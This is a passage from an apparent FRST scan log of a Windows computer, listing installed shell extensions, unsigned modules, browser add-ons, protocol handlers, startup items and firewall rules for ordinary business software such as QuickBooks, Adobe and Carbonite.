The file will not be moved unless listed separately.)
CustomCLSID:
HKU\S-1-5-21-1394640484-365018484-2708498470-1001_Classes\CLSID\{1019ADC7-17CB-4489-AFD5-6642C7400ACE}\localserver32
-> C:\Users\Karin Hostetler\AppData\Local\Webex\Webex\Applications\ptOIEx64.exe
(Cisco WebEx LLC -> Cisco WebEx LLC)
CustomCLSID:
HKU\S-1-5-21-1394640484-365018484-2708498470-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32
-> C:\Program Files (x86)\Adobe\Adobe Creative
Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems Incorporated -> Adobe Systems)
ShellIconOverlayIdentifiers: [ Carbonite.Green] ->
{95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite
Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.)
ShellIconOverlayIdentifiers: [ Carbonite.Partial] ->
{E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite
Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.)
ShellIconOverlayIdentifiers: [ Carbonite.Yellow] ->
{5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite
Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.)
ShellIconOverlayIdentifiers: [ AccExtIco1] ->
{AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common
Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems
Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] ->
{853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common
Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems
Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] ->
{42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common
Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems
Incorporated -> )
ShellIconOverlayIdentifiers-x32: [ Carbonite.Green] ->
{95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite
Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: [ Carbonite.Partial] ->
{E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite
Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: [ Carbonite.Yellow] ->
{5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite
Backup\CarboniteNSE.dll [2021-01-21] (Carbonite, Inc. -> Carbonite, Inc.)
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} =>
C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll
[2018-03-05] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] ->
{A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat
DC\Acrobat Elements\ContextMenuShim64.dll [2021-12-24] (Adobe Inc. -> Adobe
Systems Inc.)
ContextMenuHandlers1: [Carbonite] -> {FE8BD682-9A64-4740-A92B-EE7E5F7FA0A5} =>
C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2021-01-21]
(Carbonite, Inc. -> Carbonite, Inc.)
ContextMenuHandlers1: [NPDF.ShellExtension] ->
{03DDC0E5-AF08-40a2-85B9-FEDF1F4A780C} => C:\Program Files (x86)\Nuance\Power
PDF 21\ShellExt.dll [2017-05-16] (Nuance Communications, Inc. -> Nuance
Communications, Inc.)
ContextMenuHandlers1: [Nuance.SMFCDirectShellExt] ->
{B080A0B4-C3ED-4E09-B92C-66D5829AA764} => C:\Program Files (x86)\Nuance\Power
PDF 21\bin\SDirectShellExt.dll [2017-04-28] (ZEON CORPORATION -> Zeon
International Investment Corp.)
ContextMenuHandlers2: [Carbonite] -> {FE8BD682-9A64-4740-A92B-EE7E5F7FA0A5} =>
C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2021-01-21]
(Carbonite, Inc. -> Carbonite, Inc.)
ContextMenuHandlers4: [Carbonite] -> {FE8BD682-9A64-4740-A92B-EE7E5F7FA0A5} =>
C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2021-01-21]
(Carbonite, Inc. -> Carbonite, Inc.)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} =>
C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2019-12-04] (Advanced Micro
Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} =>
C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll
[2018-03-05] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] ->
{A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat
DC\Acrobat Elements\ContextMenuShim64.dll [2021-12-24] (Adobe Inc. -> Adobe
Systems Inc.)
==================== Codecs (Whitelisted) ====================
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
2016-09-12 23:44 - 2016-09-12 23:44 - 000014848 _____ () [File not signed] [File
is in use] C:\Program Files (x86)\DYMO\DYMO Label
Software\Interop.DYMOPrintingSupportLib.dll
2021-05-04 04:52 - 2021-05-04 04:52 - 000945152 _____ () [File not signed] [File
is in use] C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions
21.0\CefSharp.BrowserSubprocess.Core.dll
2021-05-04 04:52 - 2021-05-04 04:52 - 001430528 _____ () [File not signed] [File
is in use] C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions
21.0\CefSharp.Core.dll
2017-11-27 10:46 - 2009-02-27 17:38 - 000139264 ____R () [File not signed]
C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2021-05-04 05:07 - 2021-05-04 05:07 - 106512384 _____ () [File not signed]
C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\libcef.dll
2021-05-04 04:52 - 2021-05-04 04:52 - 000312832 _____ () [File not signed]
C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\libegl.dll
2021-05-04 04:52 - 2021-05-04 04:52 - 006925824 _____ () [File not signed]
C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\libglesv2.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000017920 _____ () [File not signed]
C:\Program Files\AMD\CNext\CNext\libEGL.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 003567616 _____ () [File not signed]
C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2018-03-13 04:47 - 2018-03-13 04:47 - 000912896 _____ () [File not signed]
C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-core.dll
2018-03-13 04:47 - 2018-03-13 04:47 - 003109888 _____ () [File not signed]
C:\Program Files\AMD\Performance Profile Client\aws-cpp-sdk-s3.dll
2015-02-19 01:13 - 2015-02-19 01:13 - 000817152 _____ () [File not signed]
C:\Program Files\AMD\Performance Profile Client\Device.dll
2015-02-19 01:13 - 2015-02-19 01:13 - 003650560 _____ () [File not signed]
C:\Program Files\AMD\Performance Profile Client\Platform.dll
2016-11-18 01:40 - 2011-05-17 17:27 - 000028672 _____ () [File not signed]
C:\Windows\jmesoft\hidhook.dll
2017-11-27 10:46 - 2005-04-22 00:36 - 000143360 _____ () [File not signed]
C:\WINDOWS\system32\BrSNMP64.dll
2005-09-07 14:03 - 2005-09-07 14:03 - 000036864 ____R (Black Ice Software, Inc.)
[File not signed] C:\Program Files (x86)\Nuance\PaperPort\blicectr.dll
2017-11-27 10:46 - 2012-07-13 14:09 - 000385024 ____N (Brother Industries, Ltd.)
[File not signed] C:\Program Files (x86)\Browny02\BrMonitor.dll
2017-11-27 10:46 - 2012-07-14 04:53 - 000087040 _____ (Brother Industries, Ltd.)
[File not signed] C:\WINDOWS\system32\BrNetSti.dll
2016-09-13 00:20 - 2016-09-13 00:20 - 000042496 _____ (DYMO) [File not signed]
[File is in use] C:\Program Files (x86)\DYMO\DYMO Label
Software\DYMO.DLS.Printing.Service.dll
2009-06-25 10:27 - 2009-06-25 10:27 - 000541184 _____ (Marvell Semiconductor,
Inc.) [File not signed] C:\WINDOWS\System32\mvtcpmon.dll
2006-01-19 04:36 - 2006-01-19 04:36 - 001017856 _____ (Microsoft Corporation)
[File not signed] C:\Program Files (x86)\Common
Files\Intuit\QuickBooks\QBUpdate\dbghelp.dll
2017-11-14 13:22 - 2017-11-14 13:22 - 001017856 _____ (Microsoft Corporation)
[File not signed] C:\Program Files (x86)\Intuit\QuickBooks 2020\dbghelp.dll
2021-05-04 04:52 - 2021-05-04 04:52 - 001017856 _____ (Microsoft Corporation)
[File not signed] C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions
21.0\dbghelp.dll
2009-06-25 10:25 - 2009-06-25 10:25 - 000144896 _____ (OpenSLP) [File not
signed] C:\WINDOWS\System32\slp64.dll
2016-09-13 01:36 - 2016-09-13 01:36 - 000147456 _____ (Sanford L.P.) [File not
signed] [File is in use] C:\Program Files (x86)\DYMO\DYMO Label
Software\Framework\DYMO.Label.Framework.dll
2016-09-12 23:53 - 2016-09-12 23:53 - 000356352 _____ (Sanford, L.P.) [File not
signed] [File is in use] C:\Program Files (x86)\DYMO\DYMO Label
Software\DYMO.DLS.Runtime.dll
2016-09-12 23:44 - 2016-09-12 23:44 - 000342016 _____ (Sanford, L.P.) [File not
signed] C:\Program Files (x86)\DYMO\DYMO Label Software\DYMOPrintingSupport.dll
2020-09-29 10:55 - 2022-03-22 15:41 - 000845824 _____ (SAP SE or an SAP
affiliate company) [File not signed] C:\Users\Karin
Hostetler\AppData\Local\Temp\{16AA8FB8-4A98-4757-B7A5-0FF22C0A6E33}_1704_1\dbdata17.dll
2021-05-04 04:52 - 2021-05-04 04:52 - 000814080 _____ (The Chromium Authors)
[File not signed] C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions
21.0\chrome_elf.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000031744 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qgif.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000039424 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\plugins\imageformats\qicns.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000031744 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qico.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000413696 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\plugins\imageformats\qjpeg.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000025088 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qsvg.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000025088 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qtga.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000023552 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\plugins\imageformats\qwbmp.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000519168 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\plugins\imageformats\qwebp.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 001431040 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\plugins\platforms\qwindows.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 001180672 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\plugins\sqldrivers\qsqlite.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000135680 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\plugins\styles\qwindowsvistastyle.dll
2019-12-04 21:23 - 2019-12-04 21:23 - 006010880 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Core.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 006345216 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Gui.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 001078272 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Network.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000313856 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Positioning.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 004000256 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Qml.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 003802624 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Quick.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000171008 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5QuickControls2.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 001083904 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5QuickTemplates2.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000205312 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Sql.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000329728 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Svg.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000113152 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebChannel.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000376320 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebEngine.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 092323328 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WebEngineCore.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 005560832 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Widgets.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000463360 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WinExtras.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000188416 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Xml.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 002888704 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\Qt5XmlPatterns.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000053760 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000059392 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\QtGraphicalEffects\qtgraphicaleffectsplugin.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000017408 _____ (The Qt Company Ltd.)
[File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000287232 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\QtQuick\Controls.2\qtquickcontrols2plugin.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000329216 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000136192 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000089088 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000312320 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\QtQuick\Templates.2\qtquicktemplates2plugin.dll
2019-07-18 11:33 - 2019-07-18 11:33 - 000017920 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2019-12-04 21:23 - 2019-12-04 21:23 - 000085504 _____ (The Qt Company Ltd.)
[File not signed] C:\Program
Files\AMD\CNext\CNext\QtWebEngine\qtwebengineplugin.dll
2017-05-05 16:25 - 2017-05-05 16:25 - 005251360 _____ (Zeon Corporation -> Zeon
Corporation) [File not signed] C:\Program Files (x86)\Nuance\Power PDF
21\bin\PDFCore8_x64.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\ProgramData\Temp:AB1A1E3D [742]
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry.
The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support
Customer => ""="Service"
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\Software\Microsoft\Internet
Explorer\Main,Default_Page_URL = hxxp://lenovo17win10.msn.com/?pc=LCTE
SearchScopes: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 -> DefaultScope
{B18C6A76-7C50-4965-9A1B-B109B920ADCD} URL =
SearchScopes: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 ->
{B18C6A76-7C50-4965-9A1B-B109B920ADCD} URL =
BHO: Nuance PDF Conversion Toolbar Helper ->
{940361F8-7F16-4498-AB43-2EFFE0235AFA} -> C:\Program Files (x86)\Nuance\Power
PDF 21\Bin\SPDFIEFavClient_x64.dll [2017-02-10] (Nuance Communications, Inc. ->
Zeon Corporation)
BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program
Files (x86)\LastPass\LPToolbar_x64.dll [2017-03-11] (LastPass (Marvasol Inc) ->
LastPass)
BHO: PlusIEEventHelper Class -> {9D137966-2E29-45C5-9B12-29D5427F8F66} ->
C:\Program Files (x86)\Nuance\Power PDF 21\Bin\PlusIEContextMenu_x64.dll
[2017-02-10] (Nuance Communications, Inc. -> Zeon Corporation)
BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910}
-> C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2019-01-31] (Adobe
Systems, Incorporated -> Adobe Systems Incorporated)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program
Files\Logitech\SetPointP\SetPointSmooth.dll [2015-08-25] (Logitech Inc ->
Logitech, Inc.)
BHO: Adobe Acrobat Create PDF from Selection ->
{F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2019-01-31] (Adobe
Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} ->
C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll
[2009-02-06] (Zeon Corporation) [File not signed]
BHO-x32: Nuance PDF Conversion Toolbar Helper ->
{940361F8-7F16-4498-AB43-2EFFE0235AFA} -> C:\Program Files (x86)\Nuance\Power
PDF 21\Bin\SPDFIEFavClient.dll [2017-02-10] (Nuance Communications, Inc. -> Zeon
Corporation)
BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program
Files (x86)\LastPass\LPToolbar.dll [2017-03-11] (LastPass (Marvasol Inc) ->
LastPass)
BHO-x32: PlusIEEventHelper Class -> {9D137966-2E29-45C5-9B12-29D5427F8F66} ->
C:\Program Files (x86)\Nuance\Power PDF 21\Bin\PlusIEContextMenu.dll
[2017-02-10] (Nuance Communications, Inc. -> Zeon Corporation)
BHO-x32: Adobe Acrobat Create PDF Helper ->
{AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2019-01-31] (Adobe
Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} ->
C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2015-08-25]
(Logitech Inc -> Logitech, Inc.)
BHO-x32: Adobe Acrobat Create PDF from Selection ->
{F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2019-01-31] (Adobe
Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} -
C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2017-03-11] (LastPass
(Marvasol Inc) -> LastPass)
Toolbar: HKLM - Nuance PDF Toolbar - {BED78D9C-A025-4FE9-B3BA-27E6D376A3D5} -
C:\Program Files (x86)\Nuance\Power PDF 21\Bin\SPDFIEFavClient_x64.dll
[2017-02-10] (Nuance Communications, Inc. -> Zeon Corporation)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar -
{47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2019-01-31] (Adobe
Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} -
C:\Program Files (x86)\LastPass\LPToolbar.dll [2017-03-11] (LastPass (Marvasol
Inc) -> LastPass)
Toolbar: HKLM-x32 - Nuance PDF Toolbar - {BED78D9C-A025-4FE9-B3BA-27E6D376A3D5}
- C:\Program Files (x86)\Nuance\Power PDF 21\Bin\SPDFIEFavClient.dll
[2017-02-10] (Nuance Communications, Inc. -> Zeon Corporation)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar -
{47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common
Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2019-01-31] (Adobe
Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 -> Adobe Acrobat
Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files
(x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll
[2019-01-31] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
DPF: HKLM-x32 {D0659405-AD2E-4195-B67E-8B3AC42D763E}
hxxps://c8.qbo.intuit.com/c8/v1712.1280/qboax11.cab
Handler-x32: intu-help-qb10 - {E795042F-8A29-42E4-B265-2C7AB38E8AEE} -
C:\Program Files (x86)\Intuit\QuickBooks 2017\HelpAsyncPluggableProtocol.dll
[2019-12-15] (Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb11 - {5AFDE6E8-AD0F-450B-818F-21D1CDC2E3EE} -
C:\Program Files (x86)\Intuit\QuickBooks 2018\HelpAsyncPluggableProtocol.dll
[2020-12-09] (Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb12 - {665F2BD4-8216-400B-9706-865D2B771E27} -
C:\Program Files (x86)\Intuit\QuickBooks 2019\HelpAsyncPluggableProtocol.dll
[2021-09-17] (Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb13 - {75EC4BB0-9AC5-4AF7-A9CE-38A34557E27C} -
C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions
20.0\HelpAsyncPluggableProtocol.dll [2021-09-16] (Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb14 - {C854407F-AA78-4036-A9C1-54EBA9BD3608} -
C:\Program Files (x86)\Intuit\QuickBooks 2021\HelpAsyncPluggableProtocol.dll
[2021-10-11] (Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb3 - {c5e479ea-0a65-4b05-8c6c-2fc8cc682eb4} - C:\Program
Files (x86)\Intuit\QuickBooks 2010\HelpAsyncPluggableProtocol.dll [2013-02-01]
(Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb5 - {867FCB77-9823-4cd6-8210-D85F968D466F} - C:\Program
Files (x86)\Intuit\QuickBooks 2012\HelpAsyncPluggableProtocol.dll [2021-02-02]
(Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb6 - {6898B29B-BF49-43cb-A0B1-D0B9496AF491} - C:\Program
Files (x86)\Intuit\QuickBooks 2013\HelpAsyncPluggableProtocol.dll [2016-05-09]
(Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb8 - {CD17C364-2EC8-4929-91A9-C4839A20E909} - C:\Program
Files (x86)\Intuit\QuickBooks 2015\HelpAsyncPluggableProtocol.dll [2017-04-25]
(Intuit, Inc. -> Intuit, Inc.)
Handler-x32: intu-help-qb9 - {C1252096-0E63-4C06-A38B-03DF9A16AA12} - C:\Program
Files (x86)\Intuit\QuickBooks 2016\HelpAsyncPluggableProtocol.dll [2017-12-12]
(Intuit, Inc. -> Intuit, Inc.)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} -
C:\Windows\SysWOW64\mscoree.dll [2019-12-07] (Microsoft Windows -> Microsoft
Corporation)
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site:
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\intuit.com ->
hxxps://qbo.intuit.com
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2016-07-16 07:47 - 2016-07-16 07:45 - 000000824 _____
C:\WINDOWS\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\Control
Panel\Desktop\\Wallpaper -> I:\Pics\CD\Hostetler\PETS\All three\00000 15 02
06.JPG
HKU\S-1-5-21-1394640484-365018484-2708498470-1002\Control
Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-1394640484-365018484-2708498470-1003\Control
Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-1394640484-365018484-2708498470-1006\Control
Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-1394640484-365018484-2708498470-1007\Control
Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-1394640484-365018484-2708498470-1008\Control
Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-1394640484-365018484-2708498470-1009\Control
Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-1394640484-365018484-2708498470-1010\Control
Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System =>
(ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled:
Prompt)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\StartupFolder: => "Intuit Data Protect.lnk"
HKLM\...\StartupApproved\StartupFolder: => "QuickBooks Web Connector.lnk"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "MobisynapseSyncHelper"
HKLM\...\StartupApproved\Run32: => "DymoOfficeHelper"
HKLM\...\StartupApproved\Run32: => "DYMOWebApi"
HKLM\...\StartupApproved\Run32: => "ExpressVPNNotificationService"
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\StartupApproved\Run: =>
"OneDrive"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry.
The file will not be moved unless listed separately.)
FirewallRules: [{D828E6DF-25C5-45B3-9938-E3A291F8920A}] => (Allow) C:\Program
Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe
(Intuit, Inc. -> )
